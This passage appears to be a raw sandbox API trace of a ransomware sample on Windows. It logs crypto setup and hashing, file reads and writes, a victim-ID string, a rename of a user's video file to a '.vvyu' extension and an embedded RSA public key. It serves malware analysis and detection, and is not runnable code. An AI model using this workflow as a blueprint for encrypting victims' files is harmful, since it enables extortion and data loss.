phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0203.464] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0203.464] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0203.464] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0203.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0203.464] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0203.464] GetLastError () returned 0x0 [0203.464] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0203.464] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0203.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0203.464] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0203.464] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0203.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0203.464] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0203.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xda40) returned 0x2ea99b0 [0203.465] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0203.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0203.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0203.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0203.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0203.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0203.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1f90 [0203.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3788 [0203.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1fd8 [0203.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37a0 [0203.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37d0 [0203.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3830 [0203.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37e8 [0203.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0203.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0203.466] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0203.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0203.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37d0 | out: hHeap=0x620000) returned 1 [0203.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37e8 | out: hHeap=0x620000) returned 1 [0203.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3830 | out: hHeap=0x620000) returned 1 [0203.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0203.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3830 [0203.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0203.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea37e8 [0203.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0203.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea37d0 [0203.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0203.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0203.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0203.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0203.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0203.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0203.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0203.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0203.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0203.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37e8 | out: hHeap=0x620000) returned 1 [0203.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0203.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37d0 | out: hHeap=0x620000) returned 1 [0203.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0203.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0203.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3830 | out: hHeap=0x620000) returned 1 [0203.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0203.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0203.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0203.470] GetCurrentThreadId () returned 0x66c [0203.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0203.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea3d50 [0203.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0203.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0203.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0203.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0203.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0203.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.471] GetCurrentThreadId () returned 0x66c [0203.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0203.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0203.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0203.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0203.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0203.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0203.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0203.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0203.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3830 [0203.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0203.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0203.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0203.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0203.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0203.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0203.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0203.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37d0 [0203.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0203.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0203.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0203.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0203.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0203.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0203.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea37e8 [0203.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0203.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0203.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0203.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37b8 [0203.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0203.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3848 [0203.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0203.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0203.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3818 [0203.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3800 [0203.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0203.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3860 [0203.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3800 | out: hHeap=0x620000) returned 1 [0203.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3800 [0203.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3818 | out: hHeap=0x620000) returned 1 [0203.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0203.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0203.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0203.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0203.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0203.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37d0 | out: hHeap=0x620000) returned 1 [0203.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea37d0 [0203.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0203.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0203.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3830 | out: hHeap=0x620000) returned 1 [0203.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0203.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3860 | out: hHeap=0x620000) returned 1 [0203.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0203.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0203.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0203.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0203.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0203.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37d0 | out: hHeap=0x620000) returned 1 [0203.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0203.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0203.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0203.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0203.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0203.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0203.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0203.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0203.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0203.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0203.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0203.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3800 | out: hHeap=0x620000) returned 1 [0203.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0203.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3848 | out: hHeap=0x620000) returned 1 [0203.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0203.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37e8 | out: hHeap=0x620000) returned 1 [0203.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37b8 | out: hHeap=0x620000) returned 1 [0203.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0203.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0203.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0203.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37a0 | out: hHeap=0x620000) returned 1 [0203.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1fd8 | out: hHeap=0x620000) returned 1 [0203.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0203.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0203.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0203.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0203.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0203.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0203.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0203.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0203.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0203.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0203.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0203.482] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0xda3e, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0xda3e, lpOverlapped=0x0) returned 1 [0203.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0203.483] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xda43, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.484] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0203.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0203.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4930 [0203.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0203.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0203.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0203.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4930 | out: hHeap=0x620000) returned 1 [0203.485] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0203.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0203.486] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.486] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0203.486] CloseHandle (hObject=0x510) returned 1 [0203.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x2ea6a68 [0203.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.488] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\_qbp0nkGuotBuAqg\\A9pzaRVgIaR.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\_qbp0nkguotbuaqg\\a9pzarvgiar.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\_qbp0nkGuotBuAqg\\A9pzaRVgIaR.avi.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\_qbp0nkguotbuaqg\\a9pzarvgiar.avi.vvyu")) returned 1 [0203.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.490] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ca5e50 | out: hHeap=0x620000) returned 1 [0203.493] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6dd12800, ftCreationTime.dwHighDateTime=0x1d8a4fb, ftLastAccessTime.dwLowDateTime=0x6c7ab870, ftLastAccessTime.dwHighDateTime=0x1d8a6ab, ftLastWriteTime.dwLowDateTime=0x6c7ab870, ftLastWriteTime.dwHighDateTime=0x1d8a6ab, nFileSizeHigh=0x0, nFileSizeLow=0x177e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ie5lbJNFps_4_oZKKr.mkv", cAlternateFileName="IE5LBJ~1.MKV")) returned 1 [0203.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x2ca5e50 [0203.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.493] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\_qbp0nkGuotBuAqg\\Ie5lbJNFps_4_oZKKr.mkv") returned=".mkv" [0203.493] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\_qbp0nkGuotBuAqg\\Ie5lbJNFps_4_oZKKr.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\_qbp0nkguotbuaqg\\ie5lbjnfps_4_ozkkr.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0203.494] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=96226) returned 1 [0203.494] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0203.496] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x177bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.497] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0203.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0203.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0203.499] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.499] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x177e2, lpOverlapped=0x0) returned 1 [0203.500] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") 